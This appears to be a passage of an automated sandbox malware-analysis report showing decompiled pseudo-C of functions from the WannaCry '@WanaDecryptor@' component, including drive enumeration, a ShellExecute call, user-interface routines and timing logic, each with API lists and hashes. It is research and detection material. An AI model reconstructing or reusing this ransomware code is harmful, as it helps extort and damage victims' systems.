                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                  0x00403a2c
                                  0x00403ae4
                                  0x00403a32
                                  0x00403a41
                                  0x00403a43
                                  0x00403a48
                                  0x00403a51
                                  0x00403a53
                                  0x00403a58
                                  0x00403a5e
                                  0x00403a66
                                  0x00403a69
                                  0x00403a6e
                                  0x00403a73
                                  0x00403a7f
                                  0x00403ab8
                                  0x00403abf
                                  0x00403abf
                                  0x00403a7f
                                  0x00403ac4
                                  0x00403ac5
                                  0x00403ad9
                                  0x00403ad9

                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}











                                  0x00406ef0
                                  0x00406f01
                                  0x00406f6a
                                  0x00406f6e
                                  0x00000000
                                  0x00406f6e
                                  0x00406f03
                                  0x00406f06
                                  0x00406f09
                                  0x00406f0f
                                  0x00406f10
                                  0x00406f14
                                  0x00406f15
                                  0x00406f1d
                                  0x00406f23
                                  0x00406f25
                                  0x00406f2d
                                  0x00406f2f
                                  0x00406f2f
                                  0x00406f3f
                                  0x00406f57
                                  0x00406f5d
                                  0x00406f61
                                  0x00406f62
                                  0x00000000
                                  0x00406f67
                                  0x00406f78

                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                  0x004030e0
                                  0x004030e2
                                  0x004030ed
                                  0x004030ee
                                  0x004030f5
                                  0x004030ff
                                  0x00403100
                                  0x00403105
                                  0x00403109
                                  0x00403115
                                  0x00403119
                                  0x0040311e
                                  0x0040312a
                                  0x00403131
                                  0x0040313a
                                  0x00403140
                                  0x00403146
                                  0x00403150
                                  0x00403156
                                  0x00403160
                                  0x00403166
                                  0x00403171
                                  0x0040317b

                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                  0x00404c40
                                  0x00404c42
                                  0x00404c4d
                                  0x00404c4e
                                  0x00404c55
                                  0x00404c5e
                                  0x00404c5f
                                  0x00404c64
                                  0x00404c68
                                  0x00404c70
                                  0x00404c7a
                                  0x00404c7f
                                  0x00404c86
                                  0x00404c8d
                                  0x00404c94
                                  0x00404c9b
                                  0x00404ca2
                                  0x00404ca7
                                  0x00404cad
                                  0x00404cba
                                  0x00404cc4

                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                  0x00408b40
                                  0x00408b42
                                  0x00408b4d
                                  0x00408b4e
                                  0x00408b5a
                                  0x00408b5d
                                  0x00408b61
                                  0x00408b67
                                  0x00408b6a
                                  0x00408b6e
                                  0x00408b76
                                  0x00408bd0
                                  0x00408bd3
                                  0x00408b78
                                  0x00408b78
                                  0x00408b7e
                                  0x00408b84
                                  0x00408b8b
                                  0x00408b8d
                                  0x00408b92
                                  0x00408b94
                                  0x00408b94
                                  0x00408ba7
                                  0x00408bad
                                  0x00408bb3
                                  0x00408bc1
                                  0x00408bc7
                                  0x00408bc8
                                  0x00408bc9
                                  0x00408bb5
                                  0x00408bb8
                                  0x00408bb9
                                  0x00408bba
                                  0x00408bba
                                  0x00408bb3
                                  0x00408bd6
                                  0x00408bd9
                                  0x00408bdd
                                  0x00408be5
                                  0x00408bea
                                  0x00408bf1
                                  0x00408bf7
                                  0x00408bff
                                  0x00408c0b
                                  0x00408c15

                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                  0x00404536
                                  0x00404538
                                  0x0040453d
                                  0x0040453e
                                  0x0040454b
                                  0x00404550
                                  0x00404552
                                  0x00404557
                                  0x0040455a
                                  0x0040455f
                                  0x00404564
                                  0x0040456b
                                  0x0040456c
                                  0x00404574
                                  0x0040458d
                                  0x0040459b
                                  0x0040459e
                                  0x004045a3
                                  0x004045a6
                                  0x004045af
                                  0x004045b3
                                  0x004045bb
                                  0x004045c0
                                  0x00404557
                                  0x004045c6
                                  0x004045d0

                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                  0x00406cf6
                                  0x00406cf8
                                  0x00406cfd
                                  0x00406cfe
                                  0x00406d09
                                  0x00406d0c
                                  0x00406d14
                                  0x00406d16
                                  0x00406d16
                                  0x00406d2c
                                  0x00406d32
                                  0x00406d34
                                  0x00406d39
                                  0x00406d55
                                  0x00406d5d
                                  0x00406d61
                                  0x00406d69
                                  0x00406d6f
                                  0x00406d76
                                  0x00406d7f
                                  0x00406d87
                                  0x00406d92
                                  0x00406d9c

                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                  0x00407dbe
                                  0x00407dd2
                                  0x00407dd7
                                  0x00407ddf
                                  0x00407dea
                                  0x00407dec
                                  0x00407df2
                                  0x00407dfc
                                  0x00407dfe
                                  0x00407dfe
                                  0x00407e0d
                                  0x00407e18
                                  0x00407e1d
                                  0x00407e26
                                  0x00407e2a
                                  0x00407e2c
                                  0x00407e2f
                                  0x00407e2f
                                  0x00407e34
                                  0x00407e3e
                                  0x00407e49
                                  0x00407e52
                                  0x00407e5d
                                  0x00407e6a
                                  0x00407e77

                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
